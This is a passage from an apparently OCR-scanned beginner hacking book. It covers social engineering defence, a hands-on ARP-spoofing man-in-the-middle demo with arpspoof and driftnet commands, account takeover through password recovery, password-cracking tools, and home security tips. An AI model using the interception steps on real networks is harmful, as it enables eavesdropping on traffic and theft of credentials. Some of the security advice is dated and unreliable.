code. Unfortunately, some of these offers look very real — they can 
take the form of a hot deal in a classified ad or a deal found in an 
Internet marketplace or false e-commerce site. These are hard to spot 
as scams because the attacker has found ways to manipulate the 
system to give themselves a favorable and trustworthy rating. Once 
you have been duped into following the link or download, the attacker 
has successfully injected a malicious program, virus, or malware onto 
your computer and has a foothold to carry out further attacks. 


How to Protect Yourself from Social Engineering 


Social engineering is a huge problem because it evolves with 
technology, and you can’t always know whether or not someone is 
legitimate. Fortunately, there are a lot of things you can do to reduce 
the chance that you are victimized by an attacker using these 
techniques. 


First of all, be sure to take your time and think about the 
consequences of your actions beforehand. Attacker would love it if 
you just reacted to a situation without thinking about what you are 
doing, but take a moment to think ahead — even if the message claims 
an urgent scenario. 


Also make sure that you take time to verify and validate any 
information that looks odd or suspicious. Go through their claims with 
a fine tooth comb and remember to remain skeptical. Even if you get a 
message from a company you do business with, make sure the URL 
link matches the company’s website verbatim. If they provide their 
phone number, you can do a reverse phone lookup on the Internet to 
cross-check their validity. Make sure that you never respond to an 
email that requests information such as your username or password. 
Reputable companies would never ask for your personal information 
in an email. 


In addition, make certain that you never respond to false messages 
claiming to be a response for the help you never requested. Delete 
these before ever opening them because they could contain links to 
malware that would destroy your computer. The best way to combat 
bad links is to use legitimate means to find them. For example, don’t 
follow the link in an email if you want to verify it. Instead, use a 
Google search because it extremely unlikely that an attacker with a 
face website has beaten legitimate websites in SEO endeavors to rise 
to the top of the search rankings. 


Chapter 14 — Man-In-The-Middle Attacks 


Man-in-the-middle attacks are extremely dangerous for end users 
because a successful attack will allow a hacker to view all of the data 
that a user is sending over the network. If the user is setting up a 
connection to a VPN server, the hacker will be able to capture their 
key to decipher their encrypted messages. In addition, the hacker will 
be able to see all of the websites the user visits as well as steal 
information such as usernames, passwords, and even payment card 
data. 


An attacker performs this exploit by tricking the target’s computer 
into thinking that the attacker’s computer is the default gateway or 
intended destination for data transmissions. For example, let’s say that 
you wanted to do a Google search. Normally, your data would be sent 
to your default gateway (e.g. your wireless router), routed through the 
public Internet, and then reach one of Google’s servers. However, with 
a man-in-the-middle attack, your data would first be sent to a hacker 
somewhere in the middle of the process before reaching Google’s 
servers. 


These attacks are extremely problematic because it is very difficult to 
determine that your data is being sent to a hacker before it reaches 
the intended destination. Hackers know this, and their goal is to sit 
back quietly and discretely listen to all of the traffic you are sending 
without your knowledge. 


Though there are many ways to initiate this type of attack, such as 
with a DNS attack that redirects information to a hacker’s IP address, 
they are most frequently carried out with a process called ARP 
spoofing. If you remember, I had introduced you to the concept of 
ARP in chapter 5. If you don’t remember, realize that ARP is the 
process that links a layer 2 address (MAC address) with a layer 3 
address (IP address). 


With ARP spoofing, the goal is to trick the target host into thinking 


that the hacker’s MAC address is bound to the default gateway’s IP 
address. That way the target will send any data that is not destined for 
a device on the local network to the hacker first. In turn, the hacker 
will then send the target’s data to the default gateway and out to the 
public Internet. 


While the basics of understanding a man-in-the-middle attack using 
ARP spoofing are rather basic and straightforward, ARP spoofing is 
only half of the battle. Once you have tricked a client into sending you 
their data, how do you see and read what they have sent? This brings 
us to the idea of tools called packet sniffers. A packet sniffer will be 
able to show you all of the data flowing over your computer’s network 
interface card. The details of the information contained in the packet 
sniffer data are rather complex, but you can sort through all of the 
data using filters. One of the easiest packet sniffers to use is Wireshark 
on Windows, but Linux also contains some great packet sniffing 
programs that integrate with the terminal. You even have the ability 
to store and save all of the data you have collected from a target and 
you can sift through the information at your own leisure. 


As this is an advanced topic, you likely won’t understand all of the 
various protocols you see in the data collected from your packet 
sniffer. However, as a demo aimed at beginners, you can sort through 
the data by filtering results for port 80 (HTTP) which will show you 
the IP addresses of the web servers the target is connecting to. 
Basically, this will show you every website the victim visited as well 
as other information such as usernames and passwords. 


Though some are sent in plain text and you can read them from your 
packet sniffer, many will be encrypted. Your packet sniffer can record 
these keys and then you can use other utilities to crack their 
passwords, but this is a little harder an impractical unless you want to 
become a black hat hacker. So, for those reasons, I will show you how 
to initiate a man-in-the-middle attack with ARP spoofing and how to 
use a packet sniffer to see what websites a target is connecting to. 
Also, understand that packet sniffing on a wireless interface is a little 
different than sniffing on an Ethernet interface. For that reason, this 
demo will show you how to perform the attack on a wired Ethernet 
interface. 


How to Perform a Man-In-The-Middle Attack 


To start the attack, we first need to successfully spoof an ARP binding. 
To do so, we are going to use a tool on Kali Linux called ‘arpspoof.’ 
The syntax for this command is as follows: 


-sudo arpspoof -i ethO -t [TARGET ADDRESS] [DEFAULT 
GATEWAY ADDRESS] 


So, if you wanted to trick a host on your local network with the 
address of 192.168.1.10 into thinking you were the default gateway, 
the command would look like this: 


-sudo arpspoof -i ethO -t 192.168.1.10 192.168.1.1 


If you don’t know your default gateway address, just use the ipconfig 
command in Windows or ifconfig in Linux. If you didn’t know of any 
valid host IP addresses to target, you could simply issue a simple ping 
sweep using NMAP as we did in chapter 7. The command listed above 
will trick the 192.168.1.10 host into believing your computer’s MAC 
address is associated with the default gateway’s IP address of 
192.168.1.1. At this point your terminal window will continually spit 
out lines of code ensuring that the spoofing process is succeeding, so 
you will need to open another terminal window to proceed with the 
attack. 


But there’s just one problem. You have only done half of the spoofing 
attack. At this point, your target thinks that you are the default 
gateway, but this isn’t true in the reverse process. That is to say that 
the default gateway doesn’t think you are the target host! So, in your 
new terminal window we are going to need to start another ARP 
spoofing procedure. The syntax will be the same, except the target and 
default gateway addresses will be swapped as follows: 


-sudo arpspoof -i ethO -t 192.168.1.1 192.168.1.10 


At this point in the attack, you have fooled both the default gateway 


into thinking that you are the target host and you have fooled the 
target into thinking that you are the default gateway. Now all you 
need is for the target to transmit data and to inspect that data on your 
computer. There are some higher level tools that will actually capture 
the data you catch during the process instead of dumping it as raw 
data into a text file, but packet sniffers offer a wealth of information 
too. Remember to keep both of the previous terminal windows open 
as they are still constantly running the ARP spoofing process. 


If you want to use a high level tool to see the data a target is 
searching for online that isn’t too complex, you might be interested in 
driftnet. Driftnet is a tool that - while far from perfect — is a great way 
for newbies to try their hand at a man-in-the-middle attack and view 
data such as audio files, graphics, and MPEG4 images and 
automatically display them in the GUI. To use driftnet, which is 
packaged with Kali, run the following command: 


-sudo driftnet -i ethO 


If you are doing this demo in your home network environment (as I 
instructed you to do many times already), try running the driftnet 
command. Then do a quick Google image search on the target device. 
The attacking computer that sits in the middle should be able to see 
all of the images that the target device is viewing. Pretty neat, huh? 
The problem though is that people can abuse these types of attacks to 
get away with murder and steal some truly sensitive information. 
Again, I caution you not to use this technique outside of your own 
home because the consequences could be very severe! 


Lastly, if you want to dig a little deeper with these types of attacks, 
you would want to use a packet sniffer and dig into the raw data that 
your attacking computer is gathering. You can see a lot more than 
simple images, and once you dig into the transmission protocols you 
can find data such as login information, data a user has entered into 
fields on a web form, and just about every single thing they do online! 


Chapter 15: Cracking Passwords 


Though you might not think so at first, your email is actually one of 
the most dangerous accounts to lose to a hacker. The reason being 
that there is so much personal information stored in your inbox. Once 
an attacker has access to your email account, you’re in for a world of 
hurt because they will be able to see and intercept all of the messages 
that reach your inbox. Worse yet is the idea that they now have a way 
to impersonate you. If they wanted to, an attacker could trick other 
people in your address book into forfeiting additional information by 
using your identity to request that information. 


Furthermore, there is going to be a ton of sensitive data linked with 
your email account. Websites today are getting pretty complex, and 
there are a lot of ways to link a user’s login credentials and web 
activity with their email address. For example, there will likely be 
emails and promotions from sites that you have already done business 
with sitting in your inbox or spam folder. This gives an attacker clues 
as to where he or she can look to uncover additional information. 
They may also be able to see what purchases you have made with 
online sites such as Amazon. 


Password Cracking 


While all of these scenarios are terrible, by far the worst advantage an 
attacker gains is the ability to further hack your passwords. There are 
several techniques an attacker can employ, but they all exist to steal 
your credentials to escalate their privileges. For example, who knows 
what an attacker might purchase if he or she had access to your 
Amazon account and payment card data? 


Now that you have a basic understanding of how critical secure 
passwords are and the consequences of what an attacker can do once 
they get your password, let’s look at the basics. I sure that cracking 
passwords sounds cool and really complicated, but some of the 
methods used are unbelievably simple and even a little anticlimactic. 


As commonly mentioned throughout this book, don’t try to hack 
someone else’s passwords because the consequences can terrible if you 
get caught. Don’t try to hack into a person’s email and see how many 
of their accounts you can break into just for the hell of it; that would 
be a huge breach of privacy and I shudder to think what might happen 
if you get caught stealing someone’s payment card data. 


To be honest, it would be pretty difficult for a single user who doesn’t 
have knowledge of information technology to discover how their 
account was hacked in the first place, but in a corporate or 
professional setting the I.T. department would have numerous tools to 
track electronic transactions and discern what IP address the attack or 
attempt was made from. 


The first, and simplest technique for gaining a user’s password 
assumes that you already have access to their email account. Most 
users typically only have 1 main email account that they use, but 
there could be several. Anyway, after you have obtained access to 
their email you can use the password recovery mechanisms built into 
most online account. While most people choose to cache their 
usernames in their browser so they don’t need to reenter them every 
time they login to a website, you don’t even need to know their 
username. You see, most websites provide an account recovery feature 
that allows a user to input their email address to receive their 
username and password. 


Some sites require that the account recovery feature erases the old 
password and generates a new and random password, but all of this 
information is communicated via email. So, if an attacker controlled 
and user’s email account and wanted access to their bank’s website, 
Amazon account, social media accounts, or just about anything else, 
all the attacker has to do is browse to the given website and perform 
the steps necessary for account recovery. This is an extremely quick 
process, and in a matter of minutes an attacker could easily gain 
access to the most critical sites that the user visits. 


While this may not be a sexy process, it sure gets the job done and can 
ruin an individual’s personal security. However, this is just the 
simplest measure to crack passwords and it presents a problem. How 
did you gain access to their email in the first place? There are 
countless other ways that an attacker can crack passwords to first gain 
access to the email account. For example, if a user isn’t very 
technically inclined, it is a safe bet that they don’t understand 
anything about password complexity. Though they think they are 
being clever, users are making a huge mistake when they make their 
passwords their birthday, the name of their dog, or other easy to guess 
pieces of information. 


Other times, these simple minded users will actually write their 
passwords down near their computer or plaster a sticky not on their 
monitor. It is even possible to trick these people into forfeiting their 
email passwords with social engineering. All of these methods are 
easier to use than you might think, and it gives an attacker a foothold 
into the rest of their user accounts. 


Password Cracking Utilities 


There are many different password cracking utilities to take advantage 
of, but we are going to take a brief look at the most popular pieces of 
software. Hackers will employ several of these tools in conjunction 
with one another to facilitate their attacks. They simply don’t start 
with a brute force attack because passwords can often be found using 
quicker methods. With that said, a brute force attack is usually the last 
resort when other methods have already failed. 


John the Ripper 


John the Ripper is probably one of the most famous and revered 
password cracking utilities in hacker communities. It is highly 
efficient and effective, but it does suffer from one fatal flaw that often 
keeps it out of the hands and minds of newbies: it was developed for 
Linux. Though it does have ported versions, keep in mind that it is 
natively a Linux application. 


Because some of these tools are exclusively built with Linux in mind, 
you will surely need to get your feet wet with the Linux operating 
system to become a competent hacker. By now you should have 
already setup a Linux environment to run through some of the 
demonstrations in this book using VMWare. If you haven’t already, it 
is high time to build your first Linux environment. 


As with most powerful Linux software, this program is run from the 
command line and can be a little scary if you aren’t already used to 
working from the command line. But that’s just part of the learning 
curve; once you get comfortable in this environment, you'll be able to 
run all kinds of software that is far more powerful than basic GUI 
software like you might find in a Windows environment. However, 
there is a version of this software on Mac devices since Macs derive 
from an old and powerful UNIX distribution called BSD. 


One extremely handy feature of this software is the method with 
which it uses to crack passwords by automating the process. To start, 
it will begin with a dictionary based attack. If that fails, it will move 
on to use a hybrid approach to crack passwords. If even the hybrid 
approach fails as will, it will resort to a brute force attack. 


Ophcrack 


Ophcrack is the first of the password cracking tools we will discuss, 
and like many of these tool, it is free to download and use. It can be 
used to crack passwords on a variety of operating systems, but this 
tool has gained most favor from hackers that are attempting to crack 
Windows passwords. However, it can still be used to facilitate attacks 
on Linux and Mac passwords. Though it does have simpler and more 
effective algorithms, this piece of software will allow a user to 
perform a brute force attack. Lastly, it even has a feature that will 
allow you to create a live boot image. 


LOphtcrack 


LOphtcrack is really a suite of software that allows you to perform 
many different password functions. For example, it can be used to 
audit password strength and complexity to bolster your security 
efforts. Given the range of functions this software provides, it is 
frequently used with computer security firms as well as governmental 
organizations such as military applications. Not only can it run on 
versions of Windows that are higher than Windows XP, it can also run 
on some Linux and BSD distributions. Like other password cracking 
utilities, it will allow an attacker or security expert to run both 
dictionary based attacks and brute force attacks. 


Cain & Abel 


Cain & Abel is another popular password cracking utility. Its features 
exceed only the ability to crack basic passwords or operating system 
passwords, and it even has some features that aid in the process of 
wireless security-key cracking. However, it can only be used 
exclusively in a Windows environment and it allows users to crack 
passwords that have been encrypted and encoded in various formats 
and protocols such as MySQL, Oracle, MD5, SHA1, SHA2, and various 
wireless encryption algorithms. 


As with the other utilities, this software will perform a variety of 
different password cracking methods such as dictionary attacks, 
rainbow attacks, and brute force attacks. One extremely useful feature 
of this software is that you can set parameters to fine-tune the brute 
force attack such as the length of the password you are trying to 
crack. This has the ability to eliminate millions of potential password 
combinations that would otherwise drastically multiply the length of 
time needed to carry out the attack. 


In Summary 


These tools aren’t incredibly difficult to use, but most users don’t have 
any clue that they exist. Really, all of the hard work has been done 
already by the expert programmers who created this software. All 
that’s left to do is for it to be used by an experienced hacker. Tools 
like these are so easy to use that teenagers with little experience in the 
real world can find ways to use them to hack into other people’s 
computers. Though I wouldn’t recommend using these tools for evil, 
they are certainly fun to use in a home environment. 


Chapter 16 — Protecting Yourself from Hackers 


At this point in the book you have probably already asked yourself at 
least once, “What can I do to protect myself from hackers?” The good 
news is that there are a lot of easy and simple measures you can take 
that will drastically reduce your chance of being hacked by a 
nefarious black hat hacker on the Internet. This chapter focuses on the 
different strategies you can use to make your computer and home 
network more secure. For those of you who are very technologically 
savvy, a few of these might seem like no-brainers. However, you 
would be surprised how many people fail to implement even the 
simplest measures regarding their Internet security. 


Software Updates 


Software updates are crucial to protecting yourself from hackers, but 
too many people ignore updates. Most operating systems have an 
automatic update setting that will automatically download and install 
patches to the operating system. The problem is that most people are 
apathetic or just plain lazy and they don’t want to take the time to 
install the updates. And why not? To be honest, it’s a bit of an 
inconvenience to some people. You might be right in the middle of a 
large project or your work day, and installing updates requires that 
you reboot your computer and wait for an unknown amount of time 
while the operating system install the patches. But I’ve got news for 
you — you need to take great care to install updates as soon as 
humanly possible. 


Even after some of the viruses mentioned in chapter 3 were discovered 
and patched, there were still millions of computers that were still 
contained vulnerabilities all because the users failed to update their 
software. If everyone had installed the updates as they came out, the 
viruses would have been stopped dead in their tracks. 


Change Default Usernames and Passwords 


Too many people don’t think twice about changing the default 
usernames and passwords on their networking equipment. While most 
people try to create unique usernames and passwords for their 
personal computers, they often forget to secure network devices, 
wireless routers, and even their printers. Wake up people, hackers not 
only have ways to perform password attacks but they already know 
how to find the default usernames and passwords to your wireless 
router in a matter of seconds. 


Furthermore, some people fail to secure their Wi-Fi network. Instead 
of using a security algorithm that will make it hard for attackers to 
join their network subnet, they give them an open door and invite 
them to come inside. Some, but not all, wireless routers don’t include 
a default wireless password. 


Worse yet, when people are initially configuring their wireless 
routers, they fail to add a password to their Wi-Fi. You simply can’t 
leave these values at their defaults if you hope to protect yourself 
from online attacks. Lastly, most wireless home routers have an option 
in the configuration that determines who can remotely manage the 
device. If you lock down this setting to a specific IP address, hackers 
won't be able to log into your wireless router even if they know the 
username and password! 


Use Strong Passwords 


Not only should you create unique usernames and passwords for your 
devices that are different from the default values, but you should also 
make your passwords strong. You can do this by making them as long 
as possible and by including numbers, letters, and special characters. 
Though it’s true that hackers have ways to perform dictionary and 
brute force attacks whereby they try to go through every possible 
combination to find the correct password for a system, know that 
these techniques don’t work in every situation. Some websites and 
networking devices have built-in protection against brute force attacks 
that don’t allow you to attempt to login for a certain time period after 
a specified number of failed login attempts. Password security is a 
huge area of study, and most hackers know what types of data users 
incorporate into their passwords to remember them easier. So don’t 
make your street address, family pet’s name, or birthdays part of your 
passwords. 


Oh, and don’t be one of those jokers that has their password written 
on a sticky note that is attached to your monitor. A hacker 
implementing social engineering wouldn’t even have to try. You’re 
making it too easy for them by displaying your passwords for all the 
world to see. In addition, make sure that you don’t store your 
passwords in plain text files or other types of files that aren’t 
encrypted. If a hacker does steal some of your data and they get their 
hands on a file that contains usernames and passwords to other sites 
and services, you’re in for a world of hurt. 


Properly Configure Your Firewalls 


Firewalls are a critical part of any security solution designed to protect 
users from hackers, and you need to make sure that your firewall is 
configured correctly. In the past, I have seen some people struggle 
with opening the right ports to get their software configured correctly. 
One area this happens a lot is with gaming. 


Many games need specific ports opened that aren’t well known, and in 
a fit of madness and frustration, users choose to open all the ports on 
their firewall to make their game work correctly. This is a colossal 
mistake, because it will allow hackers to penetrate your network 
firewall if none of the ports are blocked. If you have problems getting 
a game to work on your home network, just do a quick google search 
to see which port needs to be opened! 


Furthermore, many people fail to take advantage of software firewalls. 
While many hardware firewalls have most of the ports blocked by 
default and do a good job of protecting a local area network, but few 
people protect themselves with a firewall on their host computer. If 
you are a Windows user, whether you know it or not you already have 
a software firewall that will add an extra layer of protection between 
you and black hat hackers. Though sometimes it is appropriate to 
disable your software firewall to allow a program to function 
correctly, you always need to remember to re-enable it after you have 
finished your work. 


Antivirus and Antimalware Software Solutions 


If you do get hacked and a hacker manages to hack your system with 
a virus or a Trojan, how will you know it exists without antivirus and 
antimalware software? Using a computer without security software is 
like begging for an attacker to steal your personal information. 


But it doesn’t stop there. It has been said many times before, but 
understand that torrents are frequently used as a distribution system 
for viruses. Too many people have fallen victim to a hacker’s virus 
because they wanted to watch some video content without paying for 
it. If you download torrents without antivirus software, you’re just 
asking for trouble. If you do have antivirus software, you can scan the 
files you download before opening them to detect any potential 
malicious code embedded in your download and avoid a computing 
crisis. For that matter, you should scan every download before you 


open it. You never know what could be hiding in an innocent-looking 
file. 


Using VPNs 


If you aren’t aware of VPN tunnels, you need to know the immense 
value they bring to the table. A VPN (Virtual Private Network) is 
essentially a service that encrypts all data communications between 
two endpoints — effectively making it impossible for a hacker, 
governmental agency, or petty Internet crook to unscramble and 
decipher the data. This guide isn’t promotional material for VPN 
providers, but the fact of the matter is that they can prevent you from 
getting hacked. Not only that, but they can stop the government from 
stealing your data. As a result of the information leaked by Edward 
Snowden, the US government and the N.S.A. have been found to be 
capturing emails, photos, telephone calls, instant messages, and many 
other types of data transmissions in an effort to prevent terrorist- 
related activities. However, the N.S.A. has stated that they haven’t 
found any information that has stopped even one terrorist-related 
event. By encrypting your data, you will make it safe from hackers 
around the world while it is in transit through the public Internet. 


Backing Up Your Data 


You might think that backing up your data is only a measure to 
protect yourself from hardware failure. While it does certainly help 
you out a ton if your computer fries, you should know that using 
backup software will protect you from black hat attacks as well. Some 
of the more sophisticated attacks damage and corrupt files, or even 
embed malicious code into common everyday files such as word 
documents. By keeping a backup copy, you can rest assured that you 
will have a clean and virus free copy of your data in the event of an 
attack. Remember the Crypto Locker virus in chapter 3? If only the 
users had backed up their data, they wouldn’t have had to worry 
about paying an Internet huckster loads of money to reclaim their 
data by means of ransom. 


Web Browser Security 


There are also a lot of things you change in your web browser that 
will drastically reduce the chance of a successful attack. As we 
discussed earlier, hackers can use malicious scripts to steal cookie and 
web browser data to steal the passwords to various sites. 


Make sure you don’t save and cache all of your username and 
password information in your web browser when visiting your 
favorite sites on the Internet. This is a huge No-No, because you are 
leaving low-hanging fruit ripe for the picking within the grasp of black 
hat hackers and Internet thieves. You’re also a lot better off if you 
disable cookies in the first place. By disabling cookies, you can 
circumvent a whole range of different online attacks and nip them in 
the bud before they become a real problem. 


It’s best to keep your web browser as light and streamlined as 
possible, and the more data you save in your browser the greater the 
chance that someone will be able to steal your information. Also 
consider that you should frequently clear your history as well. This 
provides a veritable audit trail, and an attacker could use this 
information to see every website you have visited on the Internet. 


Final Thoughts 


I want to make sure you understand that no code will ever be 100% 
infallible. Computers are created and manufactured by humans who 
are anything but perfect, and mistakes are always made. That is to say 
you run the risk of being attacked every time you fire up your 
computer and open your web browser — regardless of whether or not 
you have implemented these security practices. 


In fact, they say that the most secure computing system is one that 
doesn’t have the ability to connect to the Internet at all. However, 
implementing these security measures will make it much more 
difficult for an attacker to successfully compromise your computer. 
Think of using these security practices in the same light as risk 
aversion. For example, if someone is a vegetarian their whole life and 
they abstain from alcohol and smoking, the chance that they will 
develop a chronic or life-threatening disease is slim to none. 


Though it is still possible, their lifestyle choices severely reduce their 
risk of disease. Likewise, implementing these security procedures 
works in much the same way. The ugly truth is that operating systems 
and websites contain flaws and errors that can be exploited by 
hackers. It’s just a fact of life. But by strengthening your security, you 
make it much more difficult — if not impossible in some cases — for an 
attacker to successfully hack into your computer. 


